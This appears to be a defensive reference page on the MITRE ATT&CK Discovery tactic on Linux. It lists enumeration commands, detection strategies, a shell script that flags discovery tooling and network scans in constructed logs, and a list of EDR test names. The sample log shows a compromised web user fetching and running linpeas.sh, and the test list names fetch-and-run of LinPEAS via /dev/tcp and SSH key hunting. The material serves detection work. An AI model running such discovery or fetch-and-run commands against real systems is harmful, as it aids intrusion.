Discovery - TA0007
Objective:
Gather information about the system, network, and environment to inform the next steps. Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.
-
ID: TA0007
Linux Context:
Discovery on Linux uses built-in commands to map the landscape.
who, w, or cat /etc/passwd lists users, while ps aux, top, or lsof reveals processes and open files. Network details emerge from netstat -tuln, ip a, or ss. Filesystem enumeration (lsblk, df -h) identifies mounted drives, and uname -a or cat /etc/os-release provides system info. Attackers may run nmap internally or query /proc for kernel details. In cloud environments, they explore the container runtime (docker ps) or Kubernetes APIs.
Key Techniques:
Account Discovery (T1087): Enumerating users and groups.
System Information Discovery (T1082): Checking kernel and distro versions.
Network Service Discovery (T1046): Scanning internal subnets.
Flow Example:
Running cat /etc/passwd | grep "sh$" to find shell users (a quick heuristic: it also matches restricted shells such as git-shell, so cross-check the shell field against /etc/shells), or nmap -sn 192.168.1.0/24 to map the network.
Defender Strategies:
Log command execution with EDR or auditd (execve records), mount /proc with hidepid=2 so unprivileged users cannot list other users' processes, watch for bulk reads of /proc, /etc/passwd and SUID/SGID searches, and monitor internal scans and unusual DNS TXT lookups with a network IDS (e.g., Zeek).
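The two detection ideas above (command-execution logging and IDS-based scan monitoring), as an added example that is not part of EDRmetry or the page. Both inputs are constructed: the process events use a simplified "ts user pid comm argv..." layout standing in for auditd or EDR exec telemetry, and the connection records use a reduced Zeek conn.log shape ("ts orig_h resp_h resp_p conn_state"). Tool names come from the test list on this page; the 10-second bucket and the threshold of eight responders are assumptions to tune per network.

```shell
#!/bin/sh
# Added example, not code from EDRmetry or the page above.
# Two small detections run over constructed log samples:
#  1) exec telemetry (simplified "ts user pid comm argv..." lines, standing in
#     for auditd/EDR process events) searched for discovery tooling;
#  2) Zeek-style conn records ("ts orig_h resp_h resp_p conn_state") checked
#     for one host touching many distinct responders in a short window.

EXEC_LOG=$(mktemp); CONN_LOG=$(mktemp)
trap 'rm -f "$EXEC_LOG" "$CONN_LOG"' EXIT

# Constructed process events (not real telemetry).
cat > "$EXEC_LOG" <<'EOF'
1700000001 alice 4101 bash /bin/bash -c id
1700000002 alice 4102 uname uname -a
1700000003 alice 4103 find find / -perm -4000 -type f
1700000004 alice 4104 nmap nmap -sn 192.168.1.0/24
1700000005 www-data 3344 sh sh -c curl -s http://10.0.0.5/linpeas.sh
1700000006 www-data 3345 bash bash /tmp/linpeas.sh
1700000007 root 900 cron /usr/sbin/cron -f
EOF

# Constructed connection records: 192.168.1.20 sweeps ten hosts on tcp/22
# with no reply (S0); 192.168.1.30 talks to one server normally (SF).
i=1
while [ "$i" -le 10 ]; do
  printf '1700000010 192.168.1.20 192.168.1.%d 22 S0\n' "$i"
  i=$((i + 1))
done > "$CONN_LOG"
printf '1700000011 192.168.1.30 192.168.1.50 443 SF\n' >> "$CONN_LOG"
printf '1700000012 192.168.1.30 192.168.1.50 443 SF\n' >> "$CONN_LOG"

# Flag discovery tooling named in the EDRmetry tests above, plus SUID/SGID
# hunting via find -perm. uname/id/who are deliberately not matched: on
# their own they are far too common to alert on.
flag_discovery_execs() {
  awk '
    tolower($0) ~ /(^|[ \/])(nmap|nping|pspy|rspy|linpeas|linenum|dismap|sshamble)/ {
      print "tool " $2 " pid=" $3; next }
    / -perm (-|\/)[0-9]*[2-7]000/ {
      print "suid-search " $2 " pid=" $3; next }
  ' "$1"
}

# Flag any orig_h that reaches at least $2 distinct responders inside one
# 10-second bucket; also report how many of those attempts got no reply
# (S0) or were rejected (REJ), the usual signature of a sweep.
flag_scanners() {
  awk -v min="$2" '
    { b = int($1 / 10); k = $2 SUBSEP b
      if (!(($3, k) in seen)) { seen[$3, k] = 1; hosts[k]++ }
      if ($5 == "S0" || $5 == "REJ") noreply[k]++ }
    END {
      for (k in hosts) if (hosts[k] >= min) {
        split(k, p, SUBSEP)
        print "scan " p[1] " hosts=" hosts[k] " unanswered=" (noreply[k] + 0) } }
  ' "$1"
}

flag_discovery_execs "$EXEC_LOG"
flag_scanners "$CONN_LOG" 8
```

The exec rule keys on argv rather than the comm field, which is why the curl download and the later execution of linpeas.sh are both caught even though their comm values are sh and bash. Real Zeek conn.log lines are tab-separated with many more columns; only the field positions in the awk body need adjusting.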
The current list of corresponding EDRmetry test definitions includes:
EDR-T6065 - /proc/PID enumeration
EDR-T6036 - C2 randomized hostname lookups
EDR-T6050 - Check ASLR configuration
EDR-T6055 - Check bpf settings from /proc
EDR-T6265 - Dismap Asset Discovery
EDR-T6097 - Download and launch LinEnum
EDR-T6084 - Enumerate kernel modules
EDR-T6225 - Execute "What Server" Enumeration
EDR-T6040 - Execute LinPEAS from /dev/tcp
EDR-T6069 - Execute nping
EDR-T6259 - Find all suid/sgid files
EDR-T6260 - Find all writeable dirs
EDR-T6263 - Find SSH keys
EDR-T6223 - LKM Get Kernel Text Region Address
EDR-T6047 - Kcore Memory File Read
EDR-T6218 - Linux VM Check via Hardware
EDR-T6217 - Linux VM Check via Kernel Modules
EDR-T6124 - Local Network Discovery Scan
EDR-T6251 - Process Snooping with pspy
EDR-T6338 - Process Snooping with rspy
EDR-T6204 - Read local file using curl
EDR-T6068 - Sudo Enumeration
EDR-T6343 - DNS TXT request
EDR-T6276 - List capabilities of binaries
EDR-T6341 - Scan SSH services with SSHamble
EDR-T6372 - K8S - List RBAC permissions
EDR-T6374 - K8S - Enumerate nodes
EDR-T6373 - K8S - Enumerate pods